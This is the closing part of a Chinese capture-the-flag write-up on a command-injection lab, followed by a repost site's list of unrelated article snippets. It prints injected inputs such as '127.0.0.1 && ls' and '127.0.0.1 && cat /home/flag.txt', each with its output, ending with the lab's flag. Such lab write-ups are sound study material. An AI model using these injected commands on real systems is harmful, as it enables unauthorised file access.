-rwxr-xr-x 1 root root     31544 Nov 23  2016 blkid
-rwxr-xr-x 1 root root     23016 Nov 23  2016 blockdev
-rwxr-xr-x 1 root root     51768 Dec  6  2017 bridge
-rwxr-xr-x 1 root root     18976 Feb 21  2014 capsh
-rwxr-xr-x 1 root root     54368 Nov 23  2016 cfdisk
-rwxr-xr-x 1 root root      6288 Nov 23  2016 ctrlaltdel
-rwxr-xr-x 1 root root    116672 Sep  9  2015 debugfs
lrwxrwxrwx 1 root root         9 Apr 11  2018 depmod -> /bin/kmod
-rwxr-xr-x 1 root root   1668160 Mar  5  2018 dhclient
-rwxr-xr-x 1 root root     15716 Mar  5  2018 dhclient-script
-rwxr-xr-x 1 root root     71592 Dec 13  2013 dmsetup
-rwxr-xr-x 1 root root     23072 Sep  9  2015 dumpe2fs
-rwxr-xr-x 1 root root    248408 Sep  9  2015 e2fsck
-rwxr-xr-x 1 root root     31432 Sep  9  2015 e2image
lrwxrwxrwx 1 root root         7 Sep  9  2015 e2label -> tune2fs
-rwxr-xr-x 1 root root     10592 Sep  9  2015 e2undo
-rwxr-xr-x 1 root root     99488 Nov 23  2016 fdisk
-rwxr-xr-x 1 root root      6304 Nov 23  2016 findfs
-rwxr-xr-x 1 root root     31608 Nov 23  2016 fsck
-rwxr-xr-x 1 root root     14640 Nov 23  2016 fsck.cramfs
lrwxrwxrwx 1 root root         6 Sep  9  2015 fsck.ext2 -> e2fsck
lrwxrwxrwx 1 root root         6 Sep  9  2015 fsck.ext3 -> e2fsck
lrwxrwxrwx 1 root root         6 Sep  9  2015 fsck.ext4 -> e2fsck
lrwxrwxrwx 1 root root         6 Sep  9  2015 fsck.ext4dev -> e2fsck
-rwxr-xr-x 1 root root     31200 Nov 23  2016 fsck.minix
-rwxr-xr-x 1 root root       333 Feb 17  2016 fsck.nfs
-rwxr-xr-x 1 root root     10440 Nov 23  2016 fsfreeze
-rwxr-xr-x 1 root root      6304 Feb 17  2016 fstab-decode
-rwxr-xr-x 1 root root     14616 Nov 23  2016 fstrim
-rwxr-xr-x 1 root root      3002 Nov 23  2016 fstrim-all
-rwxr-xr-x 1 root root     10456 Feb 21  2014 getcap
-rwxr-xr-x 1 root root      6328 Feb 21  2014 getpcaps
-rwxr-xr-x 2 root root     32112 Nov 23  2016 getty
lrwxrwxrwx 1 root root         6 Jul 18  2014 halt -> reboot
-rwxr-xr-x 1 root root     35384 Nov 23  2016 hwclock
-rwxr-xr-x 1 root root     68040 Aug  5  2014 ifconfig
lrwxrwxrwx 1 root root         4 May 10  2018 ifdown -> ifup
lrwxrwxrwx 1 root root         4 May 10  2018 ifquery -> ifup
-rwxr-xr-x 1 root root     67120 May 10  2018 ifup
-rwxr-xr-x 1 root root    265848 Jul 18  2014 init
-rwxr-xr-x 1 root root        17 Oct 19  2018 initctl
-rwxr-xr-x 1 root root    193512 Jul 18  2014 initctl.distrib
lrwxrwxrwx 1 root root         9 Apr 11  2018 insmod -> /bin/kmod
-rwxr-xr-x 1 root root      2382 Aug 28  2013 installkernel
lrwxrwxrwx 1 root root         7 Dec  6  2017 ip -> /bin/ip
-rwxr-xr-x 1 root root     18760 Aug  5  2014 ipmaddr
-rwxr-xr-x 1 root root     22864 Aug  5  2014 iptunnel
-rwxr-xr-x 1 root root     14616 Nov 23  2016 isosize
-rwxr-xr-x 1 root root     10552 Feb 18  2013 kbdrate
-rwxr-xr-x 1 root root     18992 Feb 17  2016 killall5
-rwxr-xr-x 1 root root       387 Jan 15  2018 ldconfig
-rwxr-xr-x 1 root root    951888 Jan 15  2018 ldconfig.real
-rwxr-xr-x 1 root root     10544 Sep  9  2015 logsave
-rwxr-xr-x 1 root root     43584 Nov 23  2016 losetup
lrwxrwxrwx 1 root root         9 Apr 11  2018 lsmod -> /bin/kmod
-rwxr-xr-x 1 root root     19264 Aug  5  2014 mii-tool
-rwxr-xr-x 1 root root     97944 Sep  9  2015 mke2fs
-rwxr-xr-x 1 root root     10440 Nov 23  2016 mkfs
-rwxr-xr-x 1 root root     18736 Nov 23  2016 mkfs.bfs
-rwxr-xr-x 1 root root     31216 Nov 23  2016 mkfs.cramfs
lrwxrwxrwx 1 root root         6 Sep  9  2015 mkfs.ext2 -> mke2fs
lrwxrwxrwx 1 root root         6 Sep  9  2015 mkfs.ext3 -> mke2fs
lrwxrwxrwx 1 root root         6 Sep  9  2015 mkfs.ext4 -> mke2fs
lrwxrwxrwx 1 root root         6 Sep  9  2015 mkfs.ext4dev -> mke2fs
-rwxr-xr-x 1 root root     27144 Nov 23  2016 mkfs.minix
-rwxr-xr-x 1 root root     18784 Mar 16  2016 mkhomedir_helper
-rwxr-xr-x 1 root root     23112 Nov 23  2016 mkswap
-rwxr-xr-x 1 root root     31112 Feb 22  2014 mntctl
lrwxrwxrwx 1 root root         9 Apr 11  2018 modinfo -> /bin/kmod
lrwxrwxrwx 1 root root         9 Apr 11  2018 modprobe -> /bin/kmod
-rwxr-xr-x 1 root root    104968 Feb 22  2014 mountall
-rwxr-xr-x 1 root root     14816 Aug  5  2014 nameif
-rwxr-xr-x 1 root root     10544 Mar 16  2016 pam_tally
-rwxr-xr-x 1 root root     14728 Mar 16  2016 pam_tally2
-rwxr-xr-x 1 root root      6240 Nov 23  2016 pivot_root
-rwxr-xr-x 1 root root     10448 Aug  5  2014 plipconfig
-rwxr-xr-x 1 root root     81632 May  9  2018 plymouthd
lrwxrwxrwx 1 root root         6 Jul 18  2014 poweroff -> reboot
-rwxr-xr-x 1 root root     29800 Aug  5  2014 rarp
-rwxr-xr-x 1 root root     10424 Nov 23  2016 raw
-rwxr-xr-x 1 root root     14784 Jul 18  2014 reboot
lrwxrwxrwx 1 root root         7 Jul 18  2014 reload -> initctl
-rwxr-xr-x 1 root root     48160 Sep  9  2015 resize2fs
-rwxr-xr-x 1 root root      5630 Nov 29  2017 resolvconf
lrwxrwxrwx 1 root root         7 Jul 18  2014 restart -> initctl
lrwxrwxrwx 1 root root         9 Apr 11  2018 rmmod -> /bin/kmod
-rwxr-xr-x 1 root root     58032 Aug  5  2014 route
-rwxr-xr-x 1 root root     35344 Dec  6  2017 rtacct
-rwxr-xr-x 1 root root     35256 Dec  6  2017 rtmon
-rwxr-xr-x 1 root root     10240 Jul 18  2014 runlevel
-rwxr-xr-x 1 root root     10488 Feb 21  2014 setcap
-rwxr-xr-x 1 root root     10600 Feb 18  2013 setvtrgb
-rwxr-xr-x 1 root root     61856 Nov 23  2016 sfdisk
-rwxr-xr-x 1 root root       885 May 16  2017 shadowconfig
-rwxr-xr-x 1 root root     84904 Jul 18  2014 shutdown
-rwxr-xr-x 1 root root     33928 Aug  5  2014 slattach
lrwxrwxrwx 1 root root         7 Jul 18  2014 start -> initctl
-rwxr-xr-x 1 root root     28200 Mar  6  2018 start-stop-daemon
-rwxr-xr-x 1 root root     35768 Feb 17  2016 startpar
-rwxr-xr-x 1 root root      6328 Feb 17  2016 startpar-upstart-inject
lrwxrwxrwx 1 root root         7 Jul 18  2014 status -> initctl
lrwxrwxrwx 1 root root         7 Jul 18  2014 stop -> initctl
-rwxr-xr-x 1 root root     14904 Feb 17  2016 sulogin
-rwxr-xr-x 1 root root     14664 Nov 23  2016 swaplabel
lrwxrwxrwx 1 root root         6 Nov 23  2016 swapoff -> swapon
-rwxr-xr-x 1 root root     27240 Nov 23  2016 swapon
-rwxr-xr-x 1 root root     10544 Nov 23  2016 switch_root
-rwxr-xr-x 1 root root     22992 May 14  2018 sysctl
-rwxr-xr-x 1 root root    282024 Dec  6  2017 tc
-rwxr-xr-x 1 root root    104728 Jul 18  2014 telinit
-rwxr-xr-x 1 root root     68952 Sep  9  2015 tune2fs
lrwxrwxrwx 1 root root        12 Apr 12  2018 udevadm -> /bin/udevadm
lrwxrwxrwx 1 root root        26 Apr 12  2018 udevd -> /lib/systemd/systemd-udevd
-rwxr-sr-x 1 root shadow   35536 Mar 16  2016 unix_chkpwd
-rwxr-xr-x 1 root root     31376 Mar 16  2016 unix_update
-rwxr-xr-x 1 root root    133640 Jul 18  2014 upstart-dbus-bridge
-rwxr-xr-x 1 root root    125144 Jul 18  2014 upstart-event-bridge
-rwxr-xr-x 1 root root    141592 Jul 18  2014 upstart-file-bridge
-rwxr-xr-x 1 root root    133512 Jul 18  2014 upstart-local-bridge
-rwxr-xr-x 1 root root    133352 Jul 18  2014 upstart-socket-bridge
-rwxr-xr-x 1 root root     76040 Jul 18  2014 upstart-udev-bridge
-rwxr-xr-x 1 root root     47408 Mar 25  2013 ureadahead
-rwxr-xr-x 1 root root     18856 Nov 23  2016 wipefs

执行结果:
 127.0.0.1 && ls -al /srv
total 8
drwxr-xr-x 2 root root 4096 Sep 29  2018 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..

执行结果:
 127.0.0.1 && ls -al /sys
total 4
dr-xr-xr-x  13 root root    0 Jul  6 06:36 .
drwxr-xr-x   1 root root 4096 Aug  9 05:06 ..
drwxr-xr-x   2 root root    0 Aug  9 04:48 block
drwxr-xr-x  39 root root    0 Aug  9 04:48 bus
drwxr-xr-x  69 root root    0 Aug  9 04:48 class
drwxr-xr-x   4 root root    0 Aug  9 04:48 dev
drwxr-xr-x  15 root root    0 Aug  9 04:48 devices
drwxrwxrwt   2 root root   40 Aug  9 05:06 firmware
drwxr-xr-x  10 root root    0 Aug  9 04:48 fs
drwxr-xr-x   2 root root    0 Aug  9 04:48 hypervisor
drwxr-xr-x  13 root root    0 Aug  9 04:48 kernel
drwxr-xr-x 199 root root    0 Aug  9 04:48 module
drwxr-xr-x   2 root root    0 Aug  9 04:48 power

执行结果:
 127.0.0.1 && ls -al /tmp
total 8
drwxrwxrwt 1 root root 4096 Aug  9 05:06 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..

执行结果:
 127.0.0.1 && ls -al /usr
total 40
drwxr-xr-x 1 root root 4096 Sep 29  2018 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..
drwxr-xr-x 1 root root 4096 Nov 16  2018 bin
drwxr-xr-x 2 root root 4096 Apr 10  2014 games
drwxr-xr-x 1 root root 4096 Nov 16  2018 include
drwxr-xr-x 1 root root 4096 Nov 16  2018 lib
drwxr-xr-x 1 root root 4096 Sep 29  2018 local
drwxr-xr-x 1 root root 4096 Nov 16  2018 sbin
drwxr-xr-x 1 root root 4096 Nov 16  2018 share
drwxr-xr-x 2 root root 4096 Apr 10  2014 src

执行结果:
 127.0.0.1 && ls -al /var
total 56
drwxr-xr-x 1 root root   4096 Nov 16  2018 .
drwxr-xr-x 1 root root   4096 Aug  9 05:06 ..
drwxr-xr-x 2 root root   4096 Apr 10  2014 backups
drwxr-xr-x 1 root root   4096 Nov 16  2018 cache
drwxr-xr-x 1 root root   4096 Nov 16  2018 lib
drwxrwsr-x 2 root staff  4096 Apr 10  2014 local
lrwxrwxrwx 1 root root      9 Sep 29  2018 lock -> /run/lock
drwxrwxr-x 1 root syslog 4096 Nov 16  2018 log
drwxrwsr-x 2 root mail   4096 Sep 29  2018 mail
drwxr-xr-x 2 root root   4096 Sep 29  2018 opt
lrwxrwxrwx 1 root root      4 Sep 29  2018 run -> /run
drwxr-xr-x 5 root root   4096 Sep 29  2018 spool
drwxrwxrwt 2 root root   4096 Sep 29  2018 tmp
drwxr-xr-x 1 root root   4096 Nov 16  2018 www

定睛一看,这里似乎有我们需要的东西:

执行结果:
 127.0.0.1 && ls -al /home
total 12
drwxr-xr-x 1 root root 4096 Aug  9 05:06 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..
-rw-rw-r-- 1 root root   44 Aug  9 05:06 flag.txt

随后,我们执行抓取这个文件,看看里边有啥子:

执行结果:
 127.0.0.1 && cat /home/flag.txt
cyberpeace{cd3288ba986778ff50b13b41be6ee291}

哦吼~结束

总结

  1. 进入目标主机后,第一步工作就是查看一下磁盘中都那些东西,然后再根据文件名查看我们所关心的数据内容。
  2. WAF还是挺重要的,在本例中,执行的攻击为:代码注入攻击,还是挺有趣的,和SQL注入类似,都是拼接指令,让其执行。
  3. Kali中的WAF工具还是不会用…用Kali中的工具是否能够更加好用些一呢?
  4. No Pains,No Gains!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/855563.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

查看CentOS版本及系统位数与设置CentOS 7.9 2009 防火墙配置放开端口的命令与过程

查看CentOS版本及系统位数与设置CentOS 7.9 2009 防火墙配置放开端口的命令与过程

一、查看CentOS版本及系统位数 1.1 命令汇总 //1、安装redhat-lsb yum install -y redhat-lsb//2、查看系统版本信息 lsb_release -a //3、查看系统位数 getconf LONG_BIT1.2 截图 二、设置CentOS7.9 2009 防火墙配置放开端口 2.1 命令汇总 //禁止防火墙开机启动。这种方法方…
阅读更多...
侯捷C++高级编程(下)

侯捷C++高级编程(下)

对于1个类要么像指针要么像函数 主题1:转换函数 转换函数 /** 1. 转换函数没有返回类型* 2. 转换函数一般需要加上const*/ class Fraction { public:Fraction(int num,int den1):m(num),n(den){cout<<"Fraction(int num,int den1): m/n "<< m/n<&…
阅读更多...
[Leetcode - Python]704.二分查找(Easy)

[Leetcode - Python]704.二分查找(Easy)

1. 题目&#xff1a; 704.二分查找&#xff08;Easy&#xff09; 1代码&#xff1a; class Solution:def search(self, nums: List[int], target: int) -> int:left , right 0 ,len(nums)-1while left < right :mid (leftright)//2 # // 取整除&#xff0c;向…
阅读更多...
Windows 安装 pandoc 将 jupyter 导出 pdf 文件

Windows 安装 pandoc 将 jupyter 导出 pdf 文件

Windows 安装 pandoc 将 jupyter 导出 pdf 文件 1. 下载 pandoc 安装文件2. 安装 pandoc3. 安装 nbconvert4. 使用 pandoc 1. 下载 pandoc 安装文件 访问 https://github.com/jgm/pandoc/releases&#xff0c;下载最新版安装文件&#xff0c;例如&#xff0c;3.1.6.1 版&#…
阅读更多...
【Kubernetes】Kubernetes之Pod详解

【Kubernetes】Kubernetes之Pod详解

Pod 一、 Pod1. Pod 基础概念2. 在 Kubrenetes 集群中 Pod 使用方式2.1 pasue 容器2.2 kubernetes 中的 pause 容器提供的功能 3. Pod 的概念和结构组成4. Pod 的分类5. Pod 容器的分类5.1 基础容器&#xff08;infrastructure container&#xff09;5.2 初始化容器&#xff08…
阅读更多...
【效率提升—Python脚本】根据Verilog文件自动生成tb文件

【效率提升—Python脚本】根据Verilog文件自动生成tb文件

文章目录 Verilog端口文件&#xff08;仅做示范用&#xff09;对应的tb文件相应代码 在数字IC设计过程中&#xff0c;根据顶层生成testbench时存在很多重复性工作&#xff0c;因此为了提高工作效率&#xff0c;特地开发此脚本。 Verilog端口文件&#xff08;仅做示范用&#xf…
阅读更多...
Centos7离线安装MySQL8

Centos7离线安装MySQL8

1、下载MySQL https://downloads.mysql.com/archives/community/ 2、下载完毕后&#xff0c;上传到Centos&#xff0c;解压 tar -xf mysql-8.0.33-1.el7.x86_64.rpm-bundle.tar 3、逐条执行安装命令 rpm -ivh mysql-community-common-8.0.33-1.el7.x86_64.rpm rpm -ivh …
阅读更多...
C++的vector

C++的vector

文章目录 迭代器失效问题构造函数赋值运算符begin() end()size() capacity() empty()reserve()operator[ ]insert()erase()resize() 迭代器失效问题 迭代器失效,实际就是迭代器底层对应指针所指向的空间被销毁了,而使用一块已经被释放的空间 1.扩容导致迭代器失效问题 在对…
阅读更多...
JVM工作的总体机制概述

JVM工作的总体机制概述

JDK、JRE、JVM关系回顾 JVM&#xff1a;Java Virtual Machine&#xff0c;翻译过来是Java虚拟机JRE&#xff1a;Java Runtime Environment&#xff0c;翻译过来是Java运行时环境 JREJVMJava程序运行时所需要的类库JDK&#xff1a;Java Development Kits&#xff0c;翻译过来是…
阅读更多...
数据结构【图的类型定义和存储结构】

数据结构【图的类型定义和存储结构】

数据结构之图 图的定义和概念图的定义图的术语 图的类型定义图的存储结构数组&#xff08;邻接矩阵&#xff09;表示法无向图的邻接矩阵表示法有向图的邻接矩阵表示法网&#xff08;即有权图&#xff09;的邻接矩阵表示法 邻接矩阵的ADT定义邻接表&#xff08;链式&#xff09;…
阅读更多...
测试经典书籍拆分讲解

测试经典书籍拆分讲解

一、全程软件测试 测试行业的经典书籍 测试方法测试策略领域测试主流测试技术涵盖了软件测试的流程与方法体系 二、探索式测试 探索式测试的经典代表性书籍探索式测试是业务测试和手工测试实践中的一个方法论 三、Google测试之道 高级测试工程师与架构师必读讲解google的测…
阅读更多...
(学习笔记-进程管理)进程间有哪些通信方式?

(学习笔记-进程管理)进程间有哪些通信方式?

每个进程的用户地址空间都是独立的&#xff0c;一般而言是不能互相访问的&#xff0c;但内核空间时每个进程都共享的&#xff0c;所以进程之间要通信必须通过内核 管道 在Linux命令中 [ | ] 这个竖线就是一个管道。 $ ps auxf | grep mysql 它的功能是讲前一个命令&#xf…
阅读更多...
8月9日上课内容 nginx负载均衡

8月9日上课内容 nginx负载均衡

负载均衡工作当中用的很多的&#xff0c;也是面试会问的很重要的一个点 负载均衡&#xff1a;通过反向代理来实现&#xff08;nginx只有反向代理才能做负载均衡&#xff09; 正向代理的配置方法&#xff08;用的较少&#xff09; 反向代理的方式&#xff1a;四层代理与七层代…
阅读更多...
C语言:打开调用堆栈

C语言:打开调用堆栈

第一步&#xff1a;打断点 第二步&#xff1a;FnF5 第三步&#xff1a;按如图找到调用堆栈
阅读更多...
DC-8靶机

DC-8靶机

DC-8官网地址 信息收集 靶机MAC&#xff1a; 00:0C:29:3A:46:A1 主机发现 nmap -sP 192.168.80.0/24端口扫描 nmap -A -p- 192.168.80.142访问80端口 点击页面能点击的地方&#xff0c;发现每点击一个链接&#xff0c;地址栏的?nid后面的数字就会变 尝试在数字后面加个 引…
阅读更多...
【Leetcode】链表中两数之和(模拟加法器)(击败100%)

【Leetcode】链表中两数之和(模拟加法器)(击败100%)

step by step. 题目&#xff1a; 给你两个 非空 的链表&#xff0c;表示两个非负的整数。它们每位数字都是按照 逆序 的方式存储的&#xff0c;并且每个节点只能存储 一位 数字。 请你将两个数相加&#xff0c;并以相同形式返回一个表示和的链表。 你可以假设除了数字 0 之外&…
阅读更多...
2023年下半年软考初级程序员备考攻略

2023年下半年软考初级程序员备考攻略

初级程序员考试科目包含基础知识和应用技术&#xff0c;各科目的考试形式都是笔试&#xff0c;满分均为75分。程序员考试需要各科目在一次考试中均及格才算合格&#xff0c;单科及格的成绩不保留&#xff0c;也不能转移到下次考试时使用。 这里给大家理清一个程序员考试的相关…
阅读更多...
iOS开发-JsonModel的学习及使用

iOS开发-JsonModel的学习及使用

IOS JsonModel的学习及使用 当我们从服务端获取到json数据后的时候&#xff0c;我们需要在界面上展示或者保存起来&#xff0c;下面来看下直接通过NSDictionary取出数据的情况。 NSDictionary直接取出数据的诟病。 NSString *name [self.responseObj objectForKey:"nam…
阅读更多...
Vue3弹出确认(Popconfirm)

Vue3弹出确认(Popconfirm)

效果如下图&#xff1a;在线预览 APIs 参数说明类型默认值必传title确认框的标题string | slot‘’falsedescription确认框的内容描述string | slot‘’falsecontent展示的文本string | slot‘’falseicon自定义弹出确认框 Icon 图标string | slot‘’falsemaxWidth弹出确认框…
阅读更多...
《合成孔径雷达成像算法与实现》Figure3.8

《合成孔径雷达成像算法与实现》Figure3.8

与图3.7的代码区别只在于原始信号的表达式对了一个时间偏移 代码复现如下&#xff1a; clc clear all close all%参数设置 TBP 100; %时间带宽积 T 10e-6; %脉冲持续时间 tc …
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023